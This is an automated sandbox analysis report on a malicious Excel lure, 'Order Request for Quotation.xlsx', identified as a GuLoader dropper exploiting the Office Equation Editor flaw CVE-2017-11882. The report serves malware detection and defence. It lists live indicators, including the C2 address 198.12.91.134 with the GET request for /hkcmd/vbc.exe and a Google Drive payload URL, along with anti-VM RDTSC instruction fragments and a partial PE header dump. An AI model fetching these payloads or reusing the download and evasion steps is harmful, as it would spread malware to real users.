Windows Analysis Report: Order Request for Quotation.xlsx

Overview

General Information

Sample Name: Order Request for Quotation.xlsx
Analysis ID: 451298
MD5: 180907e797d9f4abe57d016b3a4a0da4
SHA1: 516bd547d90c8f4ae96c1d828908f3264012937b
SHA256: be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2740 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3020 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2536 cmdline: 'C:\Users\Public\vbc.exe' MD5: C8FEB9D53B567CD1BFB0E59CF7D26BC2)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 198.12.91.134, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3020, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3020, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3020, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2536
    Sigma detected: Execution from Suspicious Folder
    Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3020, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2536

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}
    Machine Learning detection for dropped file
    Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected

    Exploits:

    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
    Source: excel.exe | Memory has grown: Private usage: 4MB later: 71MB

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1OPtVT-x7"[OfT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 20 Jul 2021 12:02:40 GMT | Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 | Last-Modified: Tue, 20 Jul 2021 09:26:12 GMT | ETag: "1d000-5c78aa51b4a66" | Accept-Ranges: bytes | Content-Length: 118784 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global traffic | HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.12.91.134 | Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 198.12.91.134
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emf
    Source: global traffic | HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.12.91.134 | Connection: Keep-Alive
    Source: 3938F7BB.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0

    System Summary:

    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D55D9 NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D57A7 NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00401128
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D55D9
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3063
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D20EB
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7923
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D2114
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3917
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0974
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D8167
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D09EF
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D4233
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D1262
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D22A3
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D82CB
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D330A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D1CBD
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D54BA
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0CA7
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D34EA
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D2531
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D8501
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D854C
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D26CF
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D6F7F
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D379D
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0F9F
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0FFE
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D37D8
    Source: Order Request for Quotation.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: vbc[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Order Request for Quotation.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE6F4.tmp
    Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: Order Request for Quotation.xlsx | Static file information: File size 1174528 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Order Request for Quotation.xlsx | Initial sample: OLE indicators vbamacros = False
    Source: Order Request for Quotation.xlsx | Initial sample: OLE indicators encrypted = True

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match | File source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00401128 push esi; retn 4D4Dh 6_2_0040263F
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00404916 push 00000014h; ret 6_2_00404938
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D383F push ebx; iretd 6_2_003D384A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3837 push ebx; iretd 6_2_003D383E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0837 push ebx; iretd 6_2_003D0842
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D6837 push ebx; iretd 6_2_003D6842
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7037 push ebx; iretd 6_2_003D7042
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7837 push ebx; iretd 6_2_003D7842
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D5033 push ebx; iretd 6_2_003D503E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D082B push ebx; iretd 6_2_003D0836
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D682B push ebx; iretd 6_2_003D6836
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D702B push ebx; iretd 6_2_003D7036
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D782B push ebx; iretd 6_2_003D7836
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D802A push esp; iretd 6_2_003D98BA
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D5027 push ebx; iretd 6_2_003D5032
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D081F push ebx; iretd 6_2_003D082A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D681F push ebx; iretd 6_2_003D682A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D701F push ebx; iretd 6_2_003D702A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D781F push ebx; iretd 6_2_003D782A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D501B push ebx; iretd 6_2_003D5026
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0813 push ebx; iretd 6_2_003D081E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D6813 push ebx; iretd 6_2_003D681E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7013 push ebx; iretd 6_2_003D701E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7813 push ebx; iretd 6_2_003D781E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D500F push ebx; iretd 6_2_003D501A
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D0807 push ebx; iretd 6_2_003D0812
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D6807 push ebx; iretd 6_2_003D6812
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7007 push ebx; iretd 6_2_003D7012
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7807 push ebx; iretd 6_2_003D7812
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D5003 push ebx; iretd 6_2_003D500E
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D107F push ebx; iretd 6_2_003D108A
    Source: initial sample | Static PE information: section name: .text entropy: 6.90665747983
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
    Source: Order Request for Quotation.xlsx | Stream path 'EncryptedPackage' entropy: 7.99848190617 (max. 8.0)

    Malware Analysis System Evasion:

    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3917
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D8167
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D6F7F
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D379D
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D37D8
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003D9277 second address: 00000000003D928F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ecx, AF55D2FDh 0x00000009 mov dword ptr [edi+ecx], eax 0x0000000c mov ecx, C83BC8F2h 0x00000011 xor ecx, 51282A31h 0x00000017 pushad 0x00000018 rdtsc
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3063 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2220 | Thread sleep time: -360000s >= -30000s
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3063 rdtsc
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D3063 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D8167 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D732C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D2531 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D4E17 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_003D7730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp | Binary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp | Binary or memory string: !Progman
    Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Exploitation for Client Execution12 | Path Interception | Process Injection12 | Masquerading111 | OS Credential Dumping | Security Software Discovery31 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection12 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information21 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol121 | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection1 | Cached Domain Credentials | System Information Discovery33 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

    Behavior Graph

    Screenshots

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | |

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://198.12.91.134/hkcmd/vbc.exe | 0% | Avira URL Cloud | safe |

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://198.12.91.134/hkcmd/vbc.exe | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.day.com/dam/1.0 | 3938F7BB.emf.0.dr | false | | high

      Contacted IPs

      Public

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      198.12.91.134 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:451298
      Start date:20.07.2021
      Start time:14:01:21
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 17s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Order Request for Quotation.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/13@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      14:02:06 | API Interceptor | 44x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      Match | Associated Sample Name / URL | Detection | Context
      198.12.91.134 | Order Request.xlsx | malicious | 198.12.91.134/cvc/vbc.exe
      198.12.91.134 | Request For Quotation.xlsx | malicious | 198.12.91.134/html/vbc.exe

      Domains

      No context

      ASN

      Match | Associated Sample Name / URL | Detection | Context
      AS-COLOCROSSINGUS | Quotaton.xlsx | malicious | 198.12.81.125
      AS-COLOCROSSINGUS | SWIFT MESSAGE DETAILS.xlsx | malicious | 192.210.173.40
      AS-COLOCROSSINGUS | PI.xlsx | malicious | 198.23.207.48
      AS-COLOCROSSINGUS | ftpp.xlsx | malicious | 198.46.132.159
      AS-COLOCROSSINGUS | swift.xlsx | malicious | 198.23.207.48
      AS-COLOCROSSINGUS | Ever Brilliant scan.xlsx | malicious | 192.210.173.40
      AS-COLOCROSSINGUS | Payment Instruction.xlsx | malicious | 192.227.129.35
      AS-COLOCROSSINGUS | New Order.xlsx | malicious | 172.245.119.59
      AS-COLOCROSSINGUS | Invoice-Scancopy.docx | malicious | 23.94.159.183
      AS-COLOCROSSINGUS | Remittance_Form.xlsx | malicious | 172.245.119.102
      AS-COLOCROSSINGUS | Ee50nK4E89.exe | malicious | 192.227.128.168
      AS-COLOCROSSINGUS | ly1.xlsx | malicious | 198.23.212.139
      AS-COLOCROSSINGUS | INV420.xlsx | malicious | 198.46.132.159
      AS-COLOCROSSINGUS | INV420.xlsx | malicious | 198.46.132.159
      AS-COLOCROSSINGUS | document34.xlsx | malicious | 23.95.13.151
      AS-COLOCROSSINGUS | Payment Advice.xlsx | malicious | 192.210.173.40
      AS-COLOCROSSINGUS | Payment_Ref_Advice.xlsx | malicious | 192.210.173.40
      AS-COLOCROSSINGUS | FACTURAS PENDIENTES 3782#.xlsx | malicious | 198.12.91.148
      AS-COLOCROSSINGUS | Order Request.xlsx | malicious | 198.12.91.134
      AS-COLOCROSSINGUS | 11_extracted.exe | malicious | 23.94.82.41

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):118784
      Entropy (8bit):6.4666127843418355
      Encrypted:false
      SSDEEP:1536:/bjX1R6rHR+Gz6YsFdVfKcLe0NMDfuoFVHYGokXYtvcOOfgrJZ+R6rHJXdb:jjX1yH1HErzwmoFtoZtkJgrCyHJXd
      MD5:C8FEB9D53B567CD1BFB0E59CF7D26BC2
      SHA1:82A22CB59D46BAE21FA4877015E163EACC04A022
      SHA-256:642A0DF15A9B8E3124D638E755F0BDBACD0D1C3FF01B59B36213A190A5E5645A
      SHA-512:DA707134A7BFDCB66389F111BB363D1E7B7260BB718D6AE999A23FC538E2065D8BE766A713D8D20860E835EB21609BBBCB0D0B6C237124FA38BD2ADA04ACF157
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:low
      IE Cache URL:http://198.12.91.134/hkcmd/vbc.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....!.Q.................@..........(........P....@.................................8.......................................DK..(....p..jm..................................................................(... .......t............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc...jm...p...p...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\187A408E.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):648132
      Entropy (8bit):2.8121948848596445
      Encrypted:false
      SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
      MD5:D8A0B6735E4738686530BF348653BE15
